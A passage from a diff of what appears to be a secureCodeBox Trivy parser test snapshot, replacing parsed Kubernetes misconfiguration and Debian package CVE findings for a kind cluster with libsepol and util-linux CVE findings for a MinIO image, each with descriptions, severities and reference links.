Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://avd.aquasec.com/nvd/cve-2021-36084", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://access.redhat.com/security/cve/CVE-2021-36084", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "1.8.2.2", - "packageName": "apt", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", }, ], "severity": "LOW", @@ -131805,105 +132726,122 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-37600", - "installedVersion": "1:2.33.1-0.1", - "packageName": "bsdutils", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36085", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-37600", - "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", - "https://github.com/karelzak/util-linux/issues/1395", - "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", - "https://security.netapp.com/advisory/ntap-20210902-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-37600", + "https://access.redhat.com/security/cve/CVE-2021-36085", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "https://linux.oracle.com/cve/CVE-2021-36085.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36085", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "util-linux: integer overflow can lead to buffer overflow in get_sem_elements() in sys-utils/ipcutils.c", + "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-37600", + "value": "https://avd.aquasec.com/nvd/cve-2021-36085", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-37600", + "value": "https://access.redhat.com/security/cve/CVE-2021-36085", }, { "type": "URL", - "value": "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", }, { "type": "URL", - "value": "https://github.com/karelzak/util-linux/issues/1395", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210902-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-37600", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "1:2.33.1-0.1", - "packageName": "bsdutils", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + }, + { + "type": "URL", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", }, ], "severity": "LOW", @@ -131911,67 +132849,122 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-2781", - "installedVersion": "8.30-3", - "packageName": "coreutils", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36086", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "http://seclists.org/oss-sec/2016/q1/452", - "http://www.openwall.com/lists/oss-security/2016/02/28/2", - "http://www.openwall.com/lists/oss-security/2016/02/28/3", - "https://access.redhat.com/security/cve/CVE-2016-2781", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lore.kernel.org/patchwork/patch/793178/", - "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", - "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "https://access.redhat.com/security/cve/CVE-2021-36086", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "https://linux.oracle.com/cve/CVE-2021-36086.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36086", ], }, "category": "Vulnerability", - "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "name": "use-after-free in cil_reset_classpermission()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + "value": "https://avd.aquasec.com/nvd/cve-2021-36086", }, { "type": "URL", - "value": "http://seclists.org/oss-sec/2016/q1/452", + "value": "https://access.redhat.com/security/cve/CVE-2021-36086", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://lore.kernel.org/patchwork/patch/793178/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", + }, + { + "type": "URL", + "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + }, + { + "type": "URL", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", }, ], "severity": "LOW", @@ -131979,2133 +132972,2279 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-18018", - "installedVersion": "8.30-3", - "packageName": "coreutils", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36087", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", - "https://access.redhat.com/security/cve/CVE-2017-18018", - "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", - "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "https://access.redhat.com/security/cve/CVE-2021-36087", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "https://linux.oracle.com/cve/CVE-2021-36087.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36087", ], }, "category": "Vulnerability", - "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "coreutils: race condition vulnerability in chown and chgrp", + "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-18018", + "value": "https://avd.aquasec.com/nvd/cve-2021-36087", }, { "type": "URL", - "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-36087", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-18018", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.19.8", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1664", - "installedVersion": "1.19.7", - "packageName": "dpkg", - "references": [ - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", - "https://lists.debian.org/debian-security-announce/2022/msg00115.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", - "https://security.netapp.com/advisory/ntap-20221007-0002/", - "https://ubuntu.com/security/notices/USN-5446-1", - "https://ubuntu.com/security/notices/USN-5446-2", - ], - }, - "category": "Vulnerability", - "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-1", + "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-2", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-12886", - "installedVersion": "8.3.0-6", - "packageName": "gcc-8-base", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libsmartcols1", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-12886", - 